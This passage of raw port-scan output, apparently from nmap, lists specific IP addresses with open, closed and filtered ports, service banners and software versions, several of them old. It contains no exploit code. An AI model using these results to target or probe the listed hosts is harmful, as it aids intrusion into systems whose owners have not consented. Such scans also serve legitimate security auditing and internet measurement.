9414149.126.72.220 50106 tcp tcpwrapped open
9415149.126.72.220 50107 tcp tcpwrapped open
9416149.126.72.220 50112 tcp tcpwrapped open
9417149.126.72.220 50113 tcp tcpwrapped open
9418149.126.72.220 50122 tcp tcpwrapped open
9419149.126.72.220 50160 tcp tcpwrapped open
9420149.126.72.220 50443 tcp tcpwrapped open
9421149.126.72.220 51002 tcp tcpwrapped open
9422149.126.72.220 51003 tcp tcpwrapped open
9423149.126.72.220 51434 tcp tcpwrapped open
9424149.126.72.220 52010 tcp tcpwrapped open
9425149.126.72.220 52230 tcp tcpwrapped open
9426149.126.72.220 52311 tcp tcpwrapped open
9427149.126.72.220 52536 tcp tcpwrapped open
9428149.126.72.220 53480 tcp tcpwrapped open
9429149.126.72.220 53481 tcp tcpwrapped open
9430149.126.72.220 53482 tcp tcpwrapped open
9431149.126.72.220 53483 tcp tcpwrapped open
9432149.126.72.220 53484 tcp tcpwrapped open
9433149.126.72.220 53485 tcp tcpwrapped open
9434149.126.72.220 53490 tcp tcpwrapped open
9435149.126.72.220 53805 tcp tcpwrapped open
9436149.126.72.220 53806 tcp tcpwrapped open
9437149.126.72.220 54327 tcp tcpwrapped open
9438149.126.72.220 54490 tcp tcpwrapped open
9439149.126.72.220 54545 tcp tcpwrapped open
9440149.126.72.220 55055 tcp tcpwrapped open
9441149.126.72.220 55080 tcp tcpwrapped open
9442149.126.72.220 55081 tcp tcpwrapped open
9443149.126.72.220 55350 tcp tcpwrapped open
9444149.126.72.220 55388 tcp tcpwrapped open
9445149.126.72.220 55470 tcp tcpwrapped open
9446149.126.72.220 55475 tcp tcpwrapped open
9447149.126.72.220 55481 tcp tcpwrapped open
9448149.126.72.220 55490 tcp tcpwrapped open
9449149.126.72.220 57778 tcp tcpwrapped open
9450149.126.72.220 57779 tcp tcpwrapped open
9451149.126.72.220 57780 tcp tcpwrapped open
9452149.126.72.220 57781 tcp tcpwrapped open
9453149.126.72.220 57782 tcp tcpwrapped open
9454149.126.72.220 57783 tcp tcpwrapped open
9455149.126.72.220 57784 tcp tcpwrapped open
9456149.126.72.220 57785 tcp tcpwrapped open
9457149.126.72.220 57786 tcp tcpwrapped open
9458149.126.72.220 57787 tcp tcpwrapped open
9459149.126.72.220 57788 tcp tcpwrapped open
9460149.126.72.220 58443 tcp tcpwrapped open
9461149.126.72.220 58585 tcp tcpwrapped open
9462149.126.72.220 59012 tcp tcpwrapped open
9463149.126.72.220 59443 tcp tcpwrapped open
9464149.126.72.220 60021 tcp tcpwrapped open
9465149.126.72.220 60023 tcp tcpwrapped open
9466149.126.72.220 60443 tcp tcpwrapped open
9467149.126.72.220 62080 tcp tcpwrapped open
9468149.126.72.220 62237 tcp tcpwrapped open
9469149.126.72.220 62443 tcp tcpwrapped open
9470149.126.72.220 62865 tcp tcpwrapped open
9471149.126.72.220 63443 tcp tcpwrapped open
9472149.126.72.220 64477 tcp tcpwrapped open
9473149.126.72.220 64671 tcp tcpwrapped open
9474151.106.38.107 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 12:11. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
9475151.106.38.107 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
9476151.106.38.107 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
9477151.106.38.107 67 tcp dhcps filtered
9478151.106.38.107 67 udp dhcps unknown
9479151.106.38.107 68 tcp dhcpc filtered
9480151.106.38.107 68 udp dhcpc unknown
9481151.106.38.107 69 tcp tftp filtered
9482151.106.38.107 69 udp tftp unknown
9483151.106.38.107 88 tcp kerberos-sec filtered
9484151.106.38.107 88 udp kerberos-sec unknown
9485151.106.38.107 123 tcp ntp filtered
9486151.106.38.107 123 udp ntp unknown
9487151.106.38.107 137 tcp netbios-ns filtered
9488151.106.38.107 137 udp netbios-ns unknown
9489151.106.38.107 138 tcp netbios-dgm filtered
9490151.106.38.107 138 udp netbios-dgm unknown
9491151.106.38.107 139 tcp netbios-ssn filtered
9492151.106.38.107 139 udp netbios-ssn unknown
9493151.106.38.107 161 tcp snmp filtered
9494151.106.38.107 161 udp snmp unknown
9495151.106.38.107 162 tcp snmptrap filtered
9496151.106.38.107 162 udp snmptrap unknown
9497151.106.38.107 389 tcp ldap filtered
9498151.106.38.107 389 udp ldap unknown
9499151.106.38.107 520 tcp efs filtered
9500151.106.38.107 520 udp route unknown
9501151.106.38.107 2049 tcp nfs filtered
9502151.106.38.107 2049 udp nfs unknown
9503158.69.13.254 22 tcp ssh open OpenSSH 7.4 protocol 2.0
9504158.69.13.254 25 tcp smtp open Exim smtpd 4.92.3
9505158.69.13.254 53 tcp domain open unknown banner: get lost
9506158.69.13.254 53 udp domain open unknown banner: get lost
9507158.69.13.254 67 tcp dhcps filtered
9508158.69.13.254 67 udp dhcps unknown
9509158.69.13.254 68 tcp dhcpc filtered
9510158.69.13.254 68 udp dhcpc unknown
9511158.69.13.254 69 tcp tftp filtered
9512158.69.13.254 69 udp tftp unknown
9513158.69.13.254 80 tcp http open nginx
9514158.69.13.254 88 tcp kerberos-sec filtered
9515158.69.13.254 88 udp kerberos-sec unknown
9516158.69.13.254 123 tcp ntp filtered
9517158.69.13.254 123 udp ntp unknown
9518158.69.13.254 137 tcp netbios-ns filtered
9519158.69.13.254 137 udp netbios-ns unknown
9520158.69.13.254 138 tcp netbios-dgm filtered
9521158.69.13.254 138 udp netbios-dgm unknown
9522158.69.13.254 139 tcp netbios-ssn filtered
9523158.69.13.254 139 udp netbios-ssn unknown
9524158.69.13.254 161 tcp snmp filtered
9525158.69.13.254 161 udp snmp unknown
9526158.69.13.254 162 tcp snmptrap filtered
9527158.69.13.254 162 udp snmptrap unknown
9528158.69.13.254 389 tcp ldap filtered
9529158.69.13.254 389 udp ldap unknown
9530158.69.13.254 443 tcp ssl/http open nginx
9531158.69.13.254 465 tcp ssl/smtp open Exim smtpd 4.92.3
9532158.69.13.254 520 tcp efs filtered
9533158.69.13.254 520 udp route unknown
9534158.69.13.254 587 tcp smtp open Exim smtpd 4.92.3
9535158.69.13.254 2049 tcp nfs filtered
9536158.69.13.254 2049 udp nfs unknown
9537158.69.13.254 2525 tcp smtp open Exim smtpd 4.92.3
9538158.69.13.254 3306 tcp mysql open MySQL blocked - too many connection errors
9539162.244.35.13 22 tcp ssh open SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
9540162.244.35.13 25 tcp open
9541162.244.35.13 53 tcp domain open ISC BIND 9.10.6
9542162.244.35.13 53 udp domain open ISC BIND 9.10.6
9543162.244.35.13 67 tcp dhcps closed
9544162.244.35.13 67 udp dhcps closed
9545162.244.35.13 68 tcp dhcpc closed
9546162.244.35.13 68 udp dhcpc closed
9547162.244.35.13 69 tcp tftp closed
9548162.244.35.13 69 udp tftp closed
9549162.244.35.13 88 tcp kerberos-sec closed
9550162.244.35.13 88 udp kerberos-sec closed
9551162.244.35.13 123 tcp ntp closed
9552162.244.35.13 123 udp ntp closed
9553162.244.35.13 137 tcp netbios-ns filtered
9554162.244.35.13 137 udp netbios-ns unknown
9555162.244.35.13 138 tcp netbios-dgm filtered
9556162.244.35.13 138 udp netbios-dgm unknown
9557162.244.35.13 139 tcp netbios-ssn filtered
9558162.244.35.13 139 udp netbios-ssn unknown
9559162.244.35.13 161 tcp snmp closed
9560162.244.35.13 161 udp snmp closed
9561162.244.35.13 162 tcp snmptrap closed
9562162.244.35.13 162 udp snmptrap closed
9563162.244.35.13 389 tcp ldap closed
9564162.244.35.13 389 udp ldap closed
9565162.244.35.13 520 tcp efs closed
9566162.244.35.13 520 udp route closed
9567162.244.35.13 2049 tcp nfs closed
9568162.244.35.13 2049 udp nfs closed
9569163.247.48.46 53 tcp domain filtered
9570163.247.48.46 53 udp domain unknown
9571163.247.48.46 67 tcp dhcps filtered
9572163.247.48.46 67 udp dhcps unknown
9573163.247.48.46 68 tcp dhcpc filtered
9574163.247.48.46 68 udp dhcpc unknown
9575163.247.48.46 69 tcp tftp filtered
9576163.247.48.46 69 udp tftp unknown
9577163.247.48.46 88 tcp kerberos-sec filtered
9578163.247.48.46 88 udp kerberos-sec unknown
9579163.247.48.46 123 tcp ntp filtered
9580163.247.48.46 123 udp ntp unknown
9581163.247.48.46 137 tcp netbios-ns filtered
9582163.247.48.46 137 udp netbios-ns unknown
9583163.247.48.46 138 tcp netbios-dgm filtered
9584163.247.48.46 138 udp netbios-dgm unknown
9585163.247.48.46 139 tcp netbios-ssn filtered
9586163.247.48.46 139 udp netbios-ssn unknown
9587163.247.48.46 161 tcp snmp filtered
9588163.247.48.46 161 udp snmp unknown
9589163.247.48.46 162 tcp snmptrap filtered
9590163.247.48.46 162 udp snmptrap unknown
9591163.247.48.46 389 tcp ldap filtered
9592163.247.48.46 389 udp ldap unknown
9593163.247.48.46 520 tcp efs filtered
9594163.247.48.46 520 udp route unknown
9595163.247.48.46 2049 tcp nfs filtered
9596163.247.48.46 2049 udp nfs unknown
9597163.247.127.20 53 tcp domain filtered
9598163.247.127.20 53 udp domain unknown
9599163.247.127.20 67 tcp dhcps filtered
9600163.247.127.20 67 udp dhcps unknown
9601163.247.127.20 68 tcp dhcpc filtered
9602163.247.127.20 68 udp dhcpc unknown
9603163.247.127.20 69 tcp tftp filtered
9604163.247.127.20 69 udp tftp unknown
9605163.247.127.20 88 tcp kerberos-sec filtered
9606163.247.127.20 88 udp kerberos-sec unknown
9607163.247.127.20 123 tcp ntp filtered
9608163.247.127.20 123 udp ntp unknown
9609163.247.127.20 137 tcp netbios-ns filtered
9610163.247.127.20 137 udp netbios-ns unknown
9611163.247.127.20 138 tcp netbios-dgm filtered
9612163.247.127.20 138 udp netbios-dgm unknown
9613163.247.127.20 139 tcp netbios-ssn filtered
9614163.247.127.20 139 udp netbios-ssn unknown
9615163.247.127.20 161 tcp snmp filtered
9616163.247.127.20 161 udp snmp unknown
9617163.247.127.20 162 tcp snmptrap filtered
9618163.247.127.20 162 udp snmptrap unknown
9619163.247.127.20 389 tcp ldap filtered
9620163.247.127.20 389 udp ldap unknown
9621163.247.127.20 520 tcp efs filtered
9622163.247.127.20 520 udp route unknown
9623163.247.127.20 2049 tcp nfs filtered
9624163.247.127.20 2049 udp nfs unknown
9625163.247.130.114 53 tcp domain closed
9626163.247.130.114 53 udp domain unknown
9627163.247.130.114 67 tcp dhcps filtered
9628163.247.130.114 67 udp dhcps unknown
9629163.247.130.114 68 tcp dhcpc filtered
9630163.247.130.114 68 udp dhcpc unknown
9631163.247.130.114 69 tcp tftp filtered
9632163.247.130.114 69 udp tftp closed
9633163.247.130.114 88 tcp kerberos-sec filtered
9634163.247.130.114 88 udp kerberos-sec unknown
9635163.247.130.114 123 tcp ntp filtered
9636163.247.130.114 123 udp ntp unknown
9637163.247.130.114 137 tcp netbios-ns filtered
9638163.247.130.114 137 udp netbios-ns unknown
9639163.247.130.114 138 tcp netbios-dgm filtered
9640163.247.130.114 138 udp netbios-dgm unknown
9641163.247.130.114 139 tcp netbios-ssn filtered
9642163.247.130.114 139 udp netbios-ssn unknown
9643163.247.130.114 161 tcp snmp filtered
9644163.247.130.114 161 udp snmp open net-snmp; net-snmp SNMPv3 server
9645163.247.130.114 162 tcp snmptrap filtered
9646163.247.130.114 162 udp snmptrap unknown
9647163.247.130.114 389 tcp ldap filtered
9648163.247.130.114 389 udp ldap unknown
9649163.247.130.114 520 tcp efs filtered
9650163.247.130.114 520 udp route unknown
9651163.247.130.114 2049 tcp nfs filtered
9652163.247.130.114 2049 udp nfs unknown
9653165.22.143.229 53 tcp domain closed
9654165.22.143.229 53 udp domain unknown
9655165.22.143.229 67 tcp dhcps closed
9656165.22.143.229 67 udp dhcps unknown
9657165.22.143.229 68 tcp dhcpc closed
9658165.22.143.229 68 udp dhcpc unknown
9659165.22.143.229 69 tcp tftp closed
9660165.22.143.229 69 udp tftp closed
9661165.22.143.229 88 tcp kerberos-sec closed
9662165.22.143.229 88 udp kerberos-sec unknown
9663165.22.143.229 123 tcp ntp closed
9664165.22.143.229 123 udp ntp open NTP v4 secondary server
9665165.22.143.229 137 tcp netbios-ns closed
9666165.22.143.229 137 udp netbios-ns closed
9667165.22.143.229 138 tcp netbios-dgm closed
9668165.22.143.229 138 udp netbios-dgm closed
9669165.22.143.229 139 tcp netbios-ssn closed
9670165.22.143.229 139 udp netbios-ssn unknown
9671165.22.143.229 161 tcp snmp closed
9672165.22.143.229 161 udp snmp closed
9673165.22.143.229 162 tcp snmptrap closed
9674165.22.143.229 162 udp snmptrap unknown
9675165.22.143.229 389 tcp ldap closed
9676165.22.143.229 389 udp ldap closed
9677165.22.143.229 520 tcp efs closed
9678165.22.143.229 520 udp route closed
9679165.22.143.229 2049 tcp nfs closed
9680165.22.143.229 2049 udp nfs closed
9681169.239.218.20 25 tcp smtp closed
9682169.239.218.20 53 tcp domain filtered
9683169.239.218.20 53 udp domain unknown
9684169.239.218.20 67 tcp dhcps filtered
9685169.239.218.20 67 udp dhcps unknown
9686169.239.218.20 68 tcp dhcpc filtered
9687169.239.218.20 68 udp dhcpc unknown
9688169.239.218.20 69 tcp tftp filtered
9689169.239.218.20 69 udp tftp unknown
9690169.239.218.20 88 tcp kerberos-sec filtered
9691169.239.218.20 88 udp kerberos-sec unknown
9692169.239.218.20 113 tcp ident closed
9693169.239.218.20 123 tcp ntp filtered
9694169.239.218.20 123 udp ntp unknown
9695169.239.218.20 137 tcp netbios-ns filtered
9696169.239.218.20 137 udp netbios-ns filtered
9697169.239.218.20 138 tcp netbios-dgm filtered
9698169.239.218.20 138 udp netbios-dgm filtered
9699169.239.218.20 139 tcp netbios-ssn closed
9700169.239.218.20 139 udp netbios-ssn unknown
9701169.239.218.20 161 tcp snmp filtered
9702169.239.218.20 161 udp snmp unknown
9703169.239.218.20 162 tcp snmptrap filtered
9704169.239.218.20 162 udp snmptrap unknown
9705169.239.218.20 389 tcp ldap filtered
9706169.239.218.20 389 udp ldap unknown
9707169.239.218.20 445 tcp microsoft-ds closed
9708169.239.218.20 520 tcp efs filtered
9709169.239.218.20 520 udp route unknown
9710169.239.218.20 2049 tcp nfs filtered
9711169.239.218.20 2049 udp nfs unknown
9712169.239.218.20 8008 tcp tcpwrapped open
9713173.214.244.169 53 tcp domain filtered
9714173.214.244.169 53 udp domain unknown
9715173.214.244.169 67 tcp dhcps filtered
9716173.214.244.169 67 udp dhcps unknown
9717173.214.244.169 68 tcp dhcpc filtered
9718173.214.244.169 68 udp dhcpc unknown
9719173.214.244.169 69 tcp tftp filtered
9720173.214.244.169 69 udp tftp unknown
9721173.214.244.169 88 tcp kerberos-sec filtered
9722173.214.244.169 88 udp kerberos-sec unknown
9723173.214.244.169 123 tcp ntp filtered
9724173.214.244.169 123 udp ntp unknown
9725173.214.244.169 137 tcp netbios-ns filtered
9726173.214.244.169 137 udp netbios-ns unknown
9727173.214.244.169 138 tcp netbios-dgm filtered
9728173.214.244.169 138 udp netbios-dgm unknown
9729173.214.244.169 139 tcp netbios-ssn filtered
9730173.214.244.169 139 udp netbios-ssn unknown
9731173.214.244.169 161 tcp snmp filtered
9732173.214.244.169 161 udp snmp unknown
9733173.214.244.169 162 tcp snmptrap filtered
9734173.214.244.169 162 udp snmptrap unknown
9735173.214.244.169 389 tcp ldap filtered
9736173.214.244.169 389 udp ldap unknown
9737173.214.244.169 520 tcp efs filtered
9738173.214.244.169 520 udp route unknown
9739173.214.244.169 2049 tcp nfs filtered
9740173.214.244.169 2049 udp nfs unknown
9741174.142.53.51 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 50 allowed.\x0d\x0a220-Local time is now 13:59. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
9742174.142.53.51 22 tcp ssh open SSH-2.0-OpenSSH_7.4
9743174.142.53.51 25 tcp smtp closed
9744174.142.53.51 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
9745174.142.53.51 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
9746174.142.53.51 67 tcp dhcps filtered
9747174.142.53.51 67 udp dhcps unknown
9748174.142.53.51 68 tcp dhcpc filtered
9749174.142.53.51 68 udp dhcpc unknown
9750174.142.53.51 69 tcp tftp filtered
9751174.142.53.51 69 udp tftp unknown
9752174.142.53.51 88 tcp kerberos-sec filtered
9753174.142.53.51 88 udp kerberos-sec unknown
9754174.142.53.51 123 tcp ntp filtered
9755174.142.53.51 123 udp ntp unknown
9756174.142.53.51 137 tcp netbios-ns filtered
9757174.142.53.51 137 udp netbios-ns filtered
9758174.142.53.51 138 tcp netbios-dgm filtered
9759174.142.53.51 138 udp netbios-dgm filtered
9760174.142.53.51 139 tcp netbios-ssn closed
9761174.142.53.51 139 udp netbios-ssn unknown
9762174.142.53.51 161 tcp snmp filtered
9763174.142.53.51 161 udp snmp unknown
9764174.142.53.51 162 tcp snmptrap filtered
9765174.142.53.51 162 udp snmptrap unknown
9766174.142.53.51 389 tcp ldap filtered
9767174.142.53.51 389 udp ldap unknown
9768174.142.53.51 445 tcp microsoft-ds closed
9769174.142.53.51 520 tcp efs filtered
9770174.142.53.51 520 udp route unknown
9771174.142.53.51 2049 tcp nfs filtered
9772174.142.53.51 2049 udp nfs unknown
9773186.64.118.40 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 1 of 100 allowed.\x0d\x0a220-Local time is now 13:39. Server port: 21.\x0d\x0a220-This is a private system - No anonymous login\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 10 minutes of inactivity.\x0d\x0a
9774186.64.118.40 53 tcp domain filtered
9775186.64.118.40 53 udp domain closed
9776186.64.118.40 67 tcp dhcps filtered
9777186.64.118.40 67 udp dhcps unknown
9778186.64.118.40 68 tcp dhcpc filtered
9779186.64.118.40 68 udp dhcpc unknown
9780186.64.118.40 69 tcp tftp filtered
9781186.64.118.40 69 udp tftp unknown
9782186.64.118.40 88 tcp kerberos-sec filtered
9783186.64.118.40 88 udp kerberos-sec unknown
9784186.64.118.40 123 tcp ntp filtered
9785186.64.118.40 123 udp ntp unknown
9786186.64.118.40 137 tcp netbios-ns filtered
9787186.64.118.40 137 udp netbios-ns unknown
9788186.64.118.40 138 tcp netbios-dgm filtered
9789186.64.118.40 138 udp netbios-dgm unknown
9790186.64.118.40 139 tcp netbios-ssn filtered
9791186.64.118.40 139 udp netbios-ssn unknown
9792186.64.118.40 161 tcp snmp filtered
9793186.64.118.40 161 udp snmp unknown
9794186.64.118.40 162 tcp snmptrap filtered
9795186.64.118.40 162 udp snmptrap unknown
9796186.64.118.40 389 tcp ldap filtered
9797186.64.118.40 389 udp ldap unknown
9798186.64.118.40 520 tcp efs filtered
9799186.64.118.40 520 udp route unknown
9800186.64.118.40 2049 tcp nfs closed
9801186.64.118.40 2049 udp nfs unknown
9802190.98.209.37 53 tcp domain filtered
9803190.98.209.37 53 udp domain unknown
9804190.98.209.37 67 tcp dhcps filtered
9805190.98.209.37 67 udp dhcps unknown
9806190.98.209.37 68 tcp dhcpc filtered
9807190.98.209.37 68 udp dhcpc unknown
9808190.98.209.37 69 tcp tftp filtered
9809190.98.209.37 69 udp tftp unknown
9810190.98.209.37 88 tcp kerberos-sec filtered
9811190.98.209.37 88 udp kerberos-sec unknown
9812190.98.209.37 123 tcp ntp filtered
9813190.98.209.37 123 udp ntp unknown
9814190.98.209.37 137 tcp netbios-ns filtered
9815190.98.209.37 137 udp netbios-ns unknown
9816190.98.209.37 138 tcp netbios-dgm filtered
9817190.98.209.37 138 udp netbios-dgm unknown
9818190.98.209.37 139 tcp netbios-ssn filtered
9819190.98.209.37 139 udp netbios-ssn unknown
9820190.98.209.37 161 tcp snmp filtered
9821190.98.209.37 161 udp snmp unknown
9822190.98.209.37 162 tcp snmptrap filtered
9823190.98.209.37 162 udp snmptrap unknown
9824190.98.209.37 389 tcp ldap filtered
9825190.98.209.37 389 udp ldap unknown
9826190.98.209.37 520 tcp efs filtered
9827190.98.209.37 520 udp route unknown
9828190.98.209.37 2049 tcp nfs filtered
9829190.98.209.37 2049 udp nfs unknown
9830190.107.177.35 53 tcp domain filtered ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
9831190.107.177.35 53 udp domain unknown ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
9832190.107.177.35 67 tcp dhcps filtered
9833190.107.177.35 67 udp dhcps unknown
9834190.107.177.35 68 tcp dhcpc filtered
9835190.107.177.35 68 udp dhcpc unknown
9836190.107.177.35 69 tcp tftp filtered
9837190.107.177.35 69 udp tftp unknown
9838190.107.177.35 88 tcp kerberos-sec filtered
9839190.107.177.35 88 udp kerberos-sec unknown
9840190.107.177.35 123 tcp ntp filtered
9841190.107.177.35 123 udp ntp unknown
9842190.107.177.35 137 tcp netbios-ns filtered
9843190.107.177.35 137 udp netbios-ns unknown
9844190.107.177.35 138 tcp netbios-dgm filtered
9845190.107.177.35 138 udp netbios-dgm unknown
9846190.107.177.35 139 tcp netbios-ssn filtered
9847190.107.177.35 139 udp netbios-ssn unknown
9848190.107.177.35 161 tcp snmp filtered
9849190.107.177.35 161 udp snmp unknown
9850190.107.177.35 162 tcp snmptrap filtered
9851190.107.177.35 162 udp snmptrap unknown
9852190.107.177.35 389 tcp ldap filtered
9853190.107.177.35 389 udp ldap unknown
9854190.107.177.35 520 tcp efs filtered
9855190.107.177.35 520 udp route unknown
9856190.107.177.35 2049 tcp nfs filtered
9857190.107.177.35 2049 udp nfs unknown
9858190.110.121.175 53 tcp domain filtered
9859190.110.121.175 53 udp domain unknown
9860190.110.121.175 67 tcp dhcps filtered
9861190.110.121.175 67 udp dhcps unknown
9862190.110.121.175 68 tcp dhcpc filtered
9863190.110.121.175 68 udp dhcpc unknown
9864190.110.121.175 69 tcp tftp filtered
9865190.110.121.175 69 udp tftp unknown
9866190.110.121.175 88 tcp kerberos-sec filtered
9867190.110.121.175 88 udp kerberos-sec unknown
9868190.110.121.175 123 tcp ntp filtered
9869190.110.121.175 123 udp ntp unknown
9870190.110.121.175 137 tcp netbios-ns filtered
9871190.110.121.175 137 udp netbios-ns unknown
9872190.110.121.175 138 tcp netbios-dgm filtered
9873190.110.121.175 138 udp netbios-dgm unknown
9874190.110.121.175 139 tcp netbios-ssn filtered
9875190.110.121.175 139 udp netbios-ssn unknown
9876190.110.121.175 161 tcp snmp filtered
9877190.110.121.175 161 udp snmp unknown
9878190.110.121.175 162 tcp snmptrap filtered
9879190.110.121.175 162 udp snmptrap unknown
9880190.110.121.175 389 tcp ldap filtered
9881190.110.121.175 389 udp ldap unknown
9882190.110.121.175 520 tcp efs filtered
9883190.110.121.175 520 udp route unknown
9884190.110.121.175 2049 tcp nfs filtered
9885190.110.121.175 2049 udp nfs unknown
9886190.153.209.187 53 tcp domain filtered
9887190.153.209.187 53 udp domain unknown
9888190.153.209.187 67 tcp dhcps filtered
9889190.153.209.187 67 udp dhcps unknown
9890190.153.209.187 68 tcp dhcpc filtered
9891190.153.209.187 68 udp dhcpc unknown
9892190.153.209.187 69 tcp tftp filtered
9893190.153.209.187 69 udp tftp unknown
9894190.153.209.187 88 tcp kerberos-sec filtered
9895190.153.209.187 88 udp kerberos-sec unknown
9896190.153.209.187 123 tcp ntp filtered
9897190.153.209.187 123 udp ntp unknown
9898190.153.209.187 137 tcp netbios-ns filtered
9899190.153.209.187 137 udp netbios-ns unknown
9900190.153.209.187 138 tcp netbios-dgm filtered
9901190.153.209.187 138 udp netbios-dgm unknown
9902190.153.209.187 139 tcp netbios-ssn filtered
9903190.153.209.187 139 udp netbios-ssn unknown
9904190.153.209.187 161 tcp snmp filtered
9905190.153.209.187 161 udp snmp unknown
9906190.153.209.187 162 tcp snmptrap filtered
9907190.153.209.187 162 udp snmptrap unknown
9908190.153.209.187 389 tcp ldap filtered
9909190.153.209.187 389 udp ldap unknown
9910190.153.209.187 520 tcp efs filtered
9911190.153.209.187 520 udp route unknown
9912190.153.209.187 2049 tcp nfs filtered
9913190.153.209.187 2049 udp nfs unknown
9914190.153.219.254 22 tcp ssh open SSH-2.0-OpenSSH_7.4
9915190.153.219.254 53 tcp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
9916190.153.219.254 53 udp domain open ISC BIND 9.11.4-P2 RedHat Enterprise Linux 7
9917190.153.219.254 67 tcp dhcps filtered
9918190.153.219.254 67 udp dhcps unknown
9919190.153.219.254 68 tcp dhcpc filtered
9920190.153.219.254 68 udp dhcpc unknown
9921190.153.219.254 69 tcp tftp filtered
9922190.153.219.254 69 udp tftp unknown
9923190.153.219.254 88 tcp kerberos-sec filtered
9924190.153.219.254 88 udp kerberos-sec unknown
9925190.153.219.254 123 tcp ntp filtered
9926190.153.219.254 123 udp ntp unknown
9927190.153.219.254 137 tcp netbios-ns filtered
9928190.153.219.254 137 udp netbios-ns unknown
9929190.153.219.254 138 tcp netbios-dgm filtered
9930190.153.219.254 138 udp netbios-dgm unknown
9931190.153.219.254 139 tcp netbios-ssn filtered
9932190.153.219.254 139 udp netbios-ssn unknown
9933190.153.219.254 161 tcp snmp filtered
9934190.153.219.254 161 udp snmp unknown
9935190.153.219.254 162 tcp snmptrap filtered
9936190.153.219.254 162 udp snmptrap unknown
9937190.153.219.254 389 tcp ldap filtered
9938190.153.219.254 389 udp ldap unknown
9939190.153.219.254 520 tcp efs filtered
9940190.153.219.254 520 udp route unknown
9941190.153.219.254 2049 tcp nfs filtered
9942190.153.219.254 2049 udp nfs unknown
9943192.185.134.58 21 tcp ftp open 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------\x0d\x0a220-You are user number 2 of 150 allowed.\x0d\x0a220-Local time is now 22:31. Server port: 21.\x0d\x0a220-IPv6 connections are also welcome on this server.\x0d\x0a220 You will be disconnected after 15 minutes of inactivity.\x0d\x0a
9944192.185.134.58 53 tcp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
9945192.185.134.58 53 udp domain open ISC BIND 9.8.2rc1 RedHat Enterprise Linux 6
9946192.185.134.58 67 tcp dhcps closed
9947192.185.134.58 67 udp dhcps unknown
9948192.185.134.58 68 tcp dhcpc closed
9949192.185.134.58 68 udp dhcpc unknown
9950192.185.134.58 69 tcp tftp closed
9951192.185.134.58 69 udp tftp closed
9952192.185.134.58 88 tcp kerberos-sec closed
9953192.185.134.58 88 udp kerberos-sec closed
9954192.185.134.58 123 tcp ntp closed
9955192.185.134.58 123 udp ntp unknown
9956192.185.134.58 137 tcp netbios-ns closed
9957192.185.134.58 137 udp netbios-ns closed
9958192.185.134.58 138 tcp netbios-dgm closed
9959192.185.134.58 138 udp netbios-dgm closed
9960192.185.134.58 139 tcp netbios-ssn closed
9961192.185.134.58 139 udp netbios-ssn closed
9962192.185.134.58 161 tcp snmp closed
9963192.185.134.58 161 udp snmp unknown
9964192.185.134.58 162 tcp snmptrap closed
9965192.185.134.58 162 udp snmptrap closed
9966192.185.134.58 389 tcp ldap closed
9967192.185.134.58 389 udp ldap unknown
9968192.185.134.58 520 tcp efs closed
9969192.185.134.58 520 udp route unknown
9970192.185.134.58 2049 tcp nfs closed
9971192.185.134.58 2049 udp nfs unknown
9972200.2.249.28 21 tcp ftp open vsftpd 3.0.2
9973200.2.249.28 53 udp domain unknown
9974200.2.249.28 67 udp dhcps unknown
9975200.2.249.28 68 udp dhcpc unknown
9976200.2.249.28 69 udp tftp unknown
9977200.2.249.28 80 tcp http open Oracle Application Server 10g httpd 10.1.3.5.0
9978200.2.249.28 88 udp kerberos-sec unknown
9979200.2.249.28 123 udp ntp unknown
9980200.2.249.28 137 udp netbios-ns unknown
9981200.2.249.28 138 udp netbios-dgm unknown
9982200.2.249.28 139 tcp netbios-ssn open Samba smbd 4.8.3 workgroup: SAMBA
9983200.2.249.28 139 udp netbios-ssn unknown
9984200.2.249.28 161 udp snmp unknown
9985200.2.249.28 162 udp snmptrap unknown
9986200.2.249.28 389 udp ldap unknown
9987200.2.249.28 445 tcp netbios-ssn open Samba smbd 4.8.3 workgroup: SAMBA
9988200.2.249.28 520 udp route unknown
9989200.2.249.28 2049 udp nfs unknown
9990200.29.0.33 53 tcp domain filtered
9991200.29.0.33 53 udp domain unknown
9992200.29.0.33 67 tcp dhcps filtered
9993200.29.0.33 67 udp dhcps unknown
9994200.29.0.33 68 tcp dhcpc filtered
9995200.29.0.33 68 udp dhcpc unknown
9996200.29.0.33 69 tcp tftp filtered
9997200.29.0.33 69 udp tftp unknown
9998200.29.0.33 88 tcp kerberos-sec filtered
9999200.29.0.33 88 udp kerberos-sec unknown
10000200.29.0.33 123 tcp ntp filtered
10001200.29.0.33 123 udp ntp unknown
10002200.29.0.33 137 tcp netbios-ns filtered
10003200.29.0.33 137 udp netbios-ns unknown
10004200.29.0.33 138 tcp netbios-dgm filtered
10005200.29.0.33 138 udp netbios-dgm unknown
10006200.29.0.33 139 tcp netbios-ssn filtered
10007200.29.0.33 139 udp netbios-ssn unknown
10008200.29.0.33 161 tcp snmp filtered
10009200.29.0.33 161 udp snmp unknown
10010200.29.0.33 162 tcp snmptrap filtered
10011200.29.0.33 162 udp snmptrap unknown
10012200.29.0.33 389 tcp ldap filtered
10013200.29.0.33 389 udp ldap unknown
10014200.29.0.33 520 tcp efs filtered
10015200.29.0.33 520 udp route unknown
